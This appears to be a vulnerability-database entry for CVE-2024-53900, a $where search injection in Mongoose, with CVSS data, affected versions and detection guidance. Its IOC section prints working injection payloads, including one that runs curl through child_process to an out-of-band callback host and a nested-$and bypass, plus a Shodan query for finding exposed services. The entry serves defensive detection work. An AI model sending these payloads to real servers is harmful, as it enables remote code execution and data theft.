CVE-2024-53900
published 2024-12-02

CVE-2024-53900: Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.

Priority: P180 · critical · 9.1 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
In-the-wild exploitation: VulnCheck KEV (exploited in the wild)
EPSS: 3.99% (89.2th percentile)

Affected (18 ranges)

Vendor     | Product  | Version range           | Fixed in
cesanta    | mongoose | >= 0 < 6.13.6           | 6.13.6
cesanta    | mongoose | >= 3.6.0-rc0 < 5.13.23  | 5.13.23
cesanta    | mongoose | >= 6.0.0-rc0 < 6.13.5   | 6.13.5
cesanta    | mongoose | >= 7.0.0-rc0 < 7.8.3    | 7.8.3
cesanta    | mongoose | >= 7.0.0-rc0 < 7.8.4    | 7.8.4
cesanta    | mongoose | >= 8.0.0-rc0 < 8.8.3    | 8.8.3
cesanta    | mongoose | >= 8.0.0-rc0 < 8.9.5    | 8.9.5
mongoosejs | mongoose | < 6.13.6                | 6.13.6
mongoosejs | mongoose | < 6.13.5                | 6.13.5
mongoosejs | mongoose |                         |
mongoosejs | mongoose |                         |
mongoosejs | mongoose | >= 6.0.0 < 6.13.6       | 6.13.6
mongoosejs | mongoose | >= 7.0.0 < 7.8.4        | 7.8.4
mongoosejs | mongoose | >= 7.0.0 < 7.8.4        | 7.8.4
mongoosejs | mongoose | >= 7.0.1 < 7.8.3        | 7.8.3
mongoosejs | mongoose | >= 8.0.0 < 8.9.5        | 8.9.5
mongoosejs | mongoose | >= 8.0.0 < 8.9.5        | 8.9.5
mongoosejs | mongoose | >= 8.0.1 < 8.8.3        | 8.8.3

Detection & IOCs (extracted from sources)

url: {{BaseURL}}?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('curl {{interactsh-url}}')
command: global.process.mainModule.constructor._load('child_process').exec('curl {{interactsh-url}}')
url: {{BaseURL}}/posts?authorMatch={"$and":[{"$where":"this.isAdmin"}]}
other: view[match][$where]=
other: {"$and":[{"$where":"this.isAdmin"}]}
  • Detect CVE-2024-53900 exploitation by monitoring HTTP GET requests containing '$where' within the 'match' query parameter, specifically the pattern 'view[match][$where]=' in request URLs targeting Mongoose-backed Node.js applications.
  • Detect CVE-2025-23061 bypass (incomplete fix for CVE-2024-53900) by monitoring for nested $where operators inside logical operators such as $and in query parameters, e.g. '$and':[{'$where':...}] in HTTP requests to populate()-backed endpoints.
  • Response-based detection: a successful exploit of the nested $where bypass returns a JSON body containing '"isAdmin":true' alongside '"title":' and '"username":' fields with HTTP 200 and Content-Type application/json.
  • Out-of-band detection: monitor for outbound curl HTTP callbacks to an interactsh/OAST collector originating from the MongoDB/Node.js server process, triggered by the injected child_process.exec payload.
  • Use Shodan query 'Server: Mongoose' or title:"Mongoose" to identify potentially exposed Mongoose-backed services for proactive scanning.
  • CVE-2024-53900 affects Mongoose versions before 8.8.3; the incomplete fix was bypassed in CVE-2025-23061, which requires Mongoose < 8.9.5. Detection rules should account for both version ranges.
  • The CVE-2025-23061 bypass works because the patched code blocks a direct top-level $where but does not recurse into nested logical operators ($and, $or, etc.); detection logic must therefore inspect nested query structures, not just top-level keys.
  • The exploit path targets the populate() function's 'match' option; detection should be scoped to endpoints that accept user-controlled match/filter parameters passed to Mongoose populate(), not to all MongoDB query endpoints.

CVSS provenance

Source     | Score | Severity | Vector
nvd (v3.1) | 9.1   | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
ghsa       | 9.1   | CRITICAL |
osv        | 9.1   | CRITICAL |
vulncheck  | 9.1   | CRITICAL |